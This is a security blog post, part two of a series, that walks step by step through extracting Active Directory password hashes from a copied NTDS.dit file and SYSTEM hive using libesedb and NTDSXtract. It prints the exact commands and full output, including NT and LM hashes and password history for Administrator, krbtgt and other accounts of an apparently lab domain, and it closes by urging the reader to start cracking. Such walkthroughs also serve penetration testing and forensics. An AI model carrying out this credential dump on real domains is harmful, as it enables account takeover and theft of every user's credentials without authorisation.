Room362.com

Blatherings of a security addict.

Volume Shadow Copy NTDS.DIT Domain Hashes Remotely - Part 2

| Comments

Part 2, we have the NTDS.dit file and the SYSTEM.hive file. First we need a few tools:

From: http://www.ntdsxtract.com/

Download: http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip

1
wget http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip

From: http://code.google.com/p/libesedb/

Download: https://googledrive.com/host/0B3fBvzttpiiSN082cmxsbHB0anc/libesedb-alpha-20120102.tar.gz

1
wget https://googledrive.com/host/0B3fBvzttpiiSN082cmxsbHB0anc/libesedb-alpha-20120102.tar.gz

Extract the tools:

1
2
tar zxvf libesedb-alpha-20120102.tar.gz
unzip ntdsxtract_v1_0.zip

Compile/make libesedb:

1
2
3
root@wpad:~/blog/# cd libesedb-20120102
root@wpad:~/blog/libesedb-20120102# ./configure
root@wpad:~/blog/libesedb-20120102# make

Export the tables from NTDS.dit:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
root@wpad:~/blog/libesedb-20120102# cd esedbtools/
root@wpad:~/blog/libesedb-20120102/esedbtools# ./esedbexport
esedbexport 20120102

Missing source file.
Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file

Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ]
                   [ -T table_name ] [ -hvV ] source

 source: the source file

  -c:     codepage of ASCII strings, options: ascii, windows-874,
          windows-932, windows-936, windows-1250, windows-1251,
          windows-1252 (default), windows-1253, windows-1254
          windows-1255, windows-1256, windows-1257 or windows-1258
  -h:     shows this help
  -l:     logs information about the exported items
  -m:     export mode, option: all, tables (default)
          'all' exports all the tables or a single specified table with indexes,
          'tables' exports all the tables or a single specified table
  -t:     specify the basename of the target directory to export to
          (default is the source filename) esedbexport will add the suffix
          .export to the basename
  -T:     exports only a specific table
  -v:     verbose output to stderr
  -V:     print version
root@wpad:~/blog/libesedb-20120102/esedbtools#


root@wpad:~/blog/libesedb-20120102/esedbtools# ./esedbexport ../../ntds.dit
esedbexport 20120102

Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag2) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.

Move the exported tables to somewhere a bit easier:

1
2
root@wpad:~/blog/libesedb-20120102/esedbtools#
root@wpad:~/blog/libesedb-20120102/esedbtools# mv ntds.dit.export/ ../../

NTDS extract can do a lot more than just hashes:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@wpad:~/blog# cd NTDSXtract 1.0/
root@wpad:~/blog/NTDSXtract 1.0# ls
dscomputers.py  dsdeletedobjects.py  dsfileinformation.py  dsgroups.py  dstimeline.py  dsusers.py  framework  ntds
root@wpad:~/blog/NTDSXtract 1.0# python dsusers.py
DSUsers
Extracts information related to user objects

usage: dsusers.py   [option]
  options:
    --rid
          List user identified by RID
    --name
          List user identified by Name
    --passwordhashes
          Extract password hashes
    --passwordhistory
          Extract password history
    --certificates
          Extract certificates
    --supplcreds
          Extract kerberos keys
    --membership
          List groups of which the user is a member
root@wpad:~/blog/NTDSXtract 1.0#

But we like hashes:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
root@wpad:~/blog/NTDSXtract 1.0# python dsusers.py ../ntds.dit.export/datatable.3 ../ntds.dit.export/link_table.5 --passwordhashes ../SYSTEM.hive --passwordhistory ../SYSTEM.hive
Running with options:
  Extracting password hashes
  Extracting password history
Initialising engine...
Scanning database - 100% -> 3475 records processed
Extracting schema information - 100% -> 1549 records processed
Extracting object links...

List of users:
==============

Record ID:           3562
User name:           Administrator
User principal name:
SAM Account name:    Administrator
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 7ceee337-fa58-4ca0-9643-540a40161020
SID:  S-1-5-21-3825330677-773554443-1603823854-500
When created:         2012-08-22 03:12:59
When changed:         2013-05-15 04:06:55
Account expires:      Never
Password last set:    2012-08-22 02:49:42.899576
Last logon:           2013-05-15 04:08:04.547236
Last logon timestamp: 2013-05-15 04:06:55.577353
Bad password time     2013-06-07 02:34:34.560516
Logon count:          9
Bad password count:   1
User Account Control:
  NORMAL_ACCOUNT
Ancestors:
  $ROOT_OBJECT$ net projectmentor Users Administrator
Password hashes:
  Administrator:$NT$88e4d9fabaecf3ded18dd80905521b29:::
Password history:

Record ID:           3563
User name:           Guest
User principal name:
SAM Account name:    Guest
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 659723d7-1246-4959-b0fc-af80ea5e3816
SID:  S-1-5-21-3825330677-773554443-1603823854-501
When created:         2012-08-22 03:12:59
When changed:         2013-03-14 06:54:22
Account expires:      Never
Password last set:    2013-03-14 06:54:22.029303
Last logon:           2013-03-14 06:54:27.012817
Last logon timestamp: 2013-03-14 06:32:41.834022
Bad password time     2013-06-07 03:07:46.499917
Logon count:          0
Bad password count:   10
User Account Control:
  PWD Not Required
  NORMAL_ACCOUNT
  PWD Never Expires
Ancestors:
  $ROOT_OBJECT$ net projectmentor Users Guest
Password hashes:
  Guest:$NT$823893adfad2ada6e1a414f3ebdf58f7:::
Password history:

Record ID:           3564
User name:           user
User principal name:
SAM Account name:    user
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: c5a5c87a-93b4-4d80-97a1-1c605b9b0c03
SID:  S-1-5-21-3825330677-773554443-1603823854-1000
When created:         2012-08-22 03:12:59
When changed:         2013-06-07 02:51:54
Account expires:      Never
Password last set:    2013-03-14 03:25:11.793912
Last logon:           2013-06-07 02:51:54.152191
Last logon timestamp: 2013-06-07 02:51:54.152191
Bad password time     2013-04-19 05:25:40.412670
Logon count:          67
Bad password count:   0
User Account Control:
  NORMAL_ACCOUNT
  PWD Never Expires
Ancestors:
  $ROOT_OBJECT$ net projectmentor Users user
Password hashes:
  user:$NT$88e4d9fabaecf3dec18dd80905521b29:::
Password history:
  user_nthistory0:$NT$88e4d9fabafcf3dec18dd80905521b29:::
  user_nthistory1:$NT$0c61031f010b2fbb88fe449fbf262477:::
  user_nthistory2:$NT$88e4dffabaecf3dec18dd80905521b29:::
  user_lmhistory0:c869027e01c3c4fe7626a90c87cc7fed:::
  user_lmhistory1:8be023cd858da1edd21b94907afe182c:::

Record ID:           3610
User name:           krbtgt
User principal name:
SAM Account name:    krbtgt
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 74e6bd0b-e4d5-42df-98d5-24f9060061c9
SID:  S-1-5-21-3825330677-773554443-1603823854-502
When created:         2012-08-22 03:16:03
When changed:         2012-08-22 03:31:13
Account expires:      Never
Password last set:    2012-08-22 03:16:03.166457
Last logon:           Never
Last logon timestamp: Never
Bad password time     Never
Logon count:          0
Bad password count:   0
User Account Control:
  Disabled
  NORMAL_ACCOUNT
Ancestors:
  $ROOT_OBJECT$ net projectmentor Users krbtgt
Password hashes:
  krbtgt:$NT$7253e8647254716b507a2dcb149ff2da:::
Password history:
  krbtgt_nthistory0:$NT$7253e86a7254716a507a2dcb149ff2da:::
  krbtgt_lmhistory0:113926e06a31d182623633041b632929:::

Record ID:           3762
User name:           John Doe
User principal name: jdoe@projectmentor.net
SAM Account name:    jdoe
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: bbf24c63-39a9-4cc4-8aa8-933f9ddee940
SID:  S-1-5-21-3825330677-773554443-1603823854-1104
When created:         2012-08-22 04:10:52
When changed:         2013-06-05 13:04:11
Account expires:      Never
Password last set:    2013-04-19 07:11:49.849592
Last logon:           2013-06-07 02:56:25.677855
Last logon timestamp: 2013-06-05 13:04:11.674344
Bad password time     2013-05-02 03:01:12.536251
Logon count:          242
Bad password count:   0
User Account Control:
  NORMAL_ACCOUNT
  PWD Never Expires
Ancestors:
  $ROOT_OBJECT$ net projectmentor Users John Doe
Password hashes:
  John Doe:$NT$88e4d9fabaecf3ded18dd80905511b29:::
Password history:

Record ID:           3797
User name:           Random User
User principal name: randy@projectmentor.net
SAM Account name:    randy
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 2701eb29-628a-4568-a093-d33a7db10d04
SID:  S-1-5-21-3825330677-773554443-1603823854-1108
When created:         2013-04-08 02:34:04
When changed:         2013-05-27 16:06:07
Account expires:      Never
Password last set:    2013-04-19 06:59:25.423280
Last logon:           2013-04-08 02:34:10.482690
Last logon timestamp: 2013-04-08 02:34:10.482690
Bad password time     Never
Logon count:          1
Bad password count:   0
User Account Control:
  NORMAL_ACCOUNT
  PWD Never Expires
Ancestors:
  $ROOT_OBJECT$ net projectmentor Users Random User
Password hashes:
  Random User:$NT$88ead9fa5aecf3dec18dd80905521b29:::
Password history:
root@wpad:~/blog/NTDSXtract 1.0#

All done. Start crackin’

Comments